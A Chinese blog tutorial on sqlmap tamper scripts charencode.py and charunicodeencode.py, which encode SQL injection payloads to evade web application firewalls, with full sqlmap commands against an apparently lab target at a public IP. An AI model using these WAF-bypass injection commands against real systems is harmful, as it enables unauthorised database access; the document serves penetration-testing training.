0
点赞
收藏
分享

微信扫一扫

sqlmap从入门到精通-第七章-7-4 绕过WAF脚本-charencode.py&charunicodeencode.py

Xin_So 2022-06-21 阅读 18

8. charencode.py脚本

对所有的payload字符进行全部的url编码,已经编码的不处理,具体看如下演示

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="charencode.py" --proxy="http://127.0.0.1:8080" -batch

下面的演示的效果图:

sqlmap从入门到精通-第七章-7-4 绕过WAF脚本-charencode.py&charunicodeencode.py_python

 sqlmap从入门到精通-第七章-7-4 绕过WAF脚本-charencode.py&charunicodeencode.py_ico_02

 发现是可以注入的,我们查看burp的抓包效果

sqlmap从入门到精通-第七章-7-4 绕过WAF脚本-charencode.py&charunicodeencode.py_python_03

sqlmap从入门到精通-第七章-7-4 绕过WAF脚本-charencode.py&charunicodeencode.py_python_04

 -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

9. charunicodeencode.py脚本

对使用的payload非编码字符使用UnicodeURL编码,已经编码的不处理,这个跟上面提到的charencode.py脚本的区别就是在编码中增加了"u00" ,适用于所有数据库,具体看如下演示

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="charunicodeencode.py" --proxy="http://127.0.0.1:8080" -batch

下面的演示的效果图:

sqlmap从入门到精通-第七章-7-4 绕过WAF脚本-charencode.py&charunicodeencode.py_python_05

 发现并不能注入成功,查看下burp抓包的情况

sqlmap从入门到精通-第七章-7-4 绕过WAF脚本-charencode.py&charunicodeencode.py_抓包_06

 sqlmap从入门到精通-第七章-7-4 绕过WAF脚本-charencode.py&charunicodeencode.py_抓包_07

 可以看到都添加了u00

 

迷茫的人生,需要不断努力,才能看清远方模糊的志向!

举报

相关推荐

0 条评论